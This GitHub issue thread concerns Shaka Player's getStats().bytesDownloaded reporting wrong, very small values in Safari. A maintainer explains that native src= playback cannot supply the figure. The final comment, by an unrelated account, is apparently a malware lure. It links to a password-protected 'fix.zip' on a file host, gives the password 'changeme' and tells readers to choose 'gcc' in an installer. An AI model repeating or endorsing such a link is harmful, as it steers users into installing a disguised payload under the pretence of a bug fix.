### ISSUE TITLE
getStats().bytesDownloaded does not work in Safari

### ISSUE THREAD

**Issue by jakubvojacek** [shaka-project/shaka-player#7222]
**Have you read the [FAQ](https://bit.ly/ShakaFAQ) and checked for duplicate open issues?**
yes

**If the problem is related to FairPlay, have you read the tutorial?**
not related

**What version of Shaka Player are you using?**
4.8.5

**Can you reproduce the issue with our latest release version?**
yes, with 4.10.12 too

**Can you reproduce the issue with the latest code from `main`?**
Did not attempt but I am quite certain that it would happen too

**Are you using the demo app or your own custom app?**
custom app (since demo does not display bytes downloaded anywhere)

**If custom app, can you reproduce the issue using our demo app?**
there's no way that I am aware of how to show stats in demo app

**What browser and OS are you using?**
works fine in Chrome, does not work in Safari

**For embedded devices (smart TVs, etc.), what model and firmware version are you using?**
not related

**What are the manifest and license server URIs?**
you can use any content

**What configuration are you using?  What is the output of `player.getConfiguration()`?**
not related to any configuration 

**What did you do?**
play any content in Safari, use player.getStats().bytesDownloaded. 

**What did you expect to happen?**
I expected for the bytesDownloaded to be the same in Safari as in other browsers, such as Chrome

**What actually happened?**
The number of bytesDownloaded is not correct in Safari, it is very small, maybe it just counts the MPD/M3U8 data and not the actual video/audio chunks?

**Are you planning send a PR to fix it?**
No, unfortunately, I am not very familiar with JS

**Comment by avelad** [comment]
when using src= mode (i.e. using Apple's native player and not MSE), you cannot get bytesDownloaded, sorry!

**Comment by jakubvojacek** [comment]
> when using src= mode (i.e. using Apple's native player and not MSE), you cannot get bytesDownloaded, sorry!

shouldn't be bytesDownloaded `null` in such cases? Because right now its rather misleading and it screws up stats etc.

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
